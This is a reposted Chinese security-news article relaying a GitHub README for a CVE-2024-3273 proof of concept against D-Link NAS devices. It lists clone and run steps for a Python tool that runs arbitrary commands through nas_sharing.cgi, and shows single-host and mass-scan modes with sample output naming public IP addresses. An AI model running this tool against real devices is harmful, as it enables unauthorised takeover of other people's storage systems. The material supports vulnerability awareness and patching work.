「紧急漏洞」CVE-2024-3273 Proof of Concept (PoC)

admin 2024年4月8日11:17:24评论59 views字数 1083阅读3分36秒阅读模式
「紧急漏洞」CVE-2024-3273 Proof of Concept (PoC)
「紧急漏洞」CVE-2024-3273 Proof of Concept (PoC)

最新漏洞情报

「紧急漏洞」CVE-2024-3273 Proof of Concept (PoC)

独/角/鲸/安/全

「紧急漏洞」CVE-2024-3273 Proof of Concept (PoC)

此存储库包含CVE-2024-3273的概念验证(PoC),这是在D-Link NAS设备中发现的安全漏洞。该漏洞允许攻击者在易受攻击的设备上执行任意命令。

一、描述及用法

「紧急漏洞」CVE-2024-3273 Proof of Concept (PoC)
「紧急漏洞」CVE-2024-3273 Proof of Concept (PoC)
「紧急漏洞」CVE-2024-3273 Proof of Concept (PoC)
「紧急漏洞」CVE-2024-3273 Proof of Concept (PoC)
「紧急漏洞」CVE-2024-3273 Proof of Concept (PoC)
「紧急漏洞」CVE-2024-3273 Proof of Concept (PoC)
CVE-2024-3273是D-Link NAS设备中的一个漏洞,允许远程攻击者通过精心制作的HTTP请求向cgi-bin/nas_sharing.cgi端点执行任意命令。
此PoC演示了如何利用该漏洞在易受攻击的D-Link NAS设备上执行命令。
「紧急漏洞」CVE-2024-3273 Proof of Concept (PoC)

要求

  • Python 3.x

  • requests library

「紧急漏洞」CVE-2024-3273 Proof of Concept (PoC)

用法

  1. 克隆此存储库:           

    git clone https://github.com/adhikara13/CVE-2024-3273.git
  2.  导航到存储库目录:

    cd CVE-2024-3273
  3.   运行PoC:         

    python main.py

5.按照屏幕上的说明选择目标设备:

    1. 选项1:单个主机(1):输入单个目标设备的详细信息,包括主机IP地址和要运行的命令。

    2. 选项2:多个主机(2):以host:port格式提供包含多个目标设备的文件,并选择是否将易受攻击的主机导出到 vulnerables.txt

二、示例

「紧急漏洞」CVE-2024-3273 Proof of Concept (PoC)

「紧急漏洞」CVE-2024-3273 Proof of Concept (PoC)

Choose an option (1: Single Host, 2: Multiple Hosts): 1

Enter the host: 114.32.179.200

Enter the command to run: ls

Response from 114.32.179.200:

box.cgi

codepage_mgr.cgi

download_mgr.cgi

dropbox.cgi

folder_tree.cgi

「紧急漏洞」CVE-2024-3273 Proof of Concept (PoC)

Choose an option (1: Single Host, 2: Multiple Hosts): 2

Enter the file path containing hosts: list.txt

Export vulnerable host to vulnerables.txt? (y/n): y

Connection error for host 87.205.188.21:9290.

Connection error for host 186.212.112.141:8081.

Host 124.120.263.149:8032 is vulnerable.

「紧急漏洞」CVE-2024-3273 Proof of Concept (PoC)
本文转载自:
如若转载,请注明出处:https://sploitus.com/exploit?id=28504CB2-A520-5031-BEFD-56B997437166

原文始发于微信公众号(独角鲸安全):「紧急漏洞」CVE-2024-3273 Proof of Concept (PoC)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月8日11:17:24
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   「紧急漏洞」CVE-2024-3273 Proof of Concept (PoC)https://cn-sec.com/archives/2636830.html

发表评论

匿名网友 填写信息